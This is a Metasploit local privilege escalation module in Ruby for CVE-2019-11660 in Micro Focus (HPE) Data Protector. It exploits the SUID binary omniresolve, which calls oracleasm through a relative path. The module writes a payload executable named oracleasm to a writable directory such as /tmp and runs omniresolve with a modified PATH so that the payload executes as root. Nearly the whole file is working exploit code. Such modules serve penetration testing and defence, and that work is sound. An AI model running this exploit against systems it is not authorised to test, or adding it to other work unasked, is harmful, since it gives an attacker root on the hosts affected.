## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation', 'Description' => %q{ This module exploits the trusted `$PATH` environment variable of the SUID binary `omniresolve` in Micro Focus (HPE) Data Protector A.10.40 and prior. The `omniresolve` executable calls the `oracleasm` binary using a relative path and the trusted environment `$PATH`, which allows an attacker to execute a custom binary with `root` privileges. This module has been successfully tested on: HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016; Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core) The vulnerability has been patched in: Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019 }, 'License' => MSF_LICENSE, 'Author' => [ 's7u55', # Discovery and Metasploit module ], 'DisclosureDate' => '2019-09-13', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Micro Focus (HPE) Data Protector <= 10.40 build 118', { upper_version: Rex::Version.new('10.40') } ] ], 'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true }, 'References' => [ [ 'CVE', '2019-11660' ], [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ] ], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ARTIFACTS_ON_DISK] }, 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ]) ] ) register_advanced_options( [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] ) end def base_dir datastore['WritableDir'].to_s end def suid_bin_path datastore['SUID_PATH'].to_s end def check return CheckCode::Safe("#{suid_bin_path} file not found") unless file? suid_bin_path return CheckCode::Safe("#{suid_bin_path} is not setuid") unless setuid? suid_bin_path info = cmd_exec("#{suid_bin_path} -ver").to_s if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/ version = '%.2f' % ::Regexp.last_match(1).to_f build = ::Regexp.last_match(3).to_i vprint_status("omniresolve version #{version} build #{build}") unless Rex::Version.new(version) < target[:upper_version] || (Rex::Version.new(version) == target[:upper_version] && build <= 118) return CheckCode::Safe end return CheckCode::Appears end vprint_error('Could not parse omniresolve -ver output') CheckCode::Detected end def exploit if !datastore['ForceExploit'] && is_root? fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.') end unless writable?(base_dir) fail_with(Failure::BadConfig, "#{base_dir} is not writable") end payload_path = File.join(base_dir, 'oracleasm') register_file_for_cleanup(payload_path) write_file(payload_path, generate_payload_exe) chmod(payload_path) trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) register_file_for_cleanup(trigger_path) write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}") cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ") end end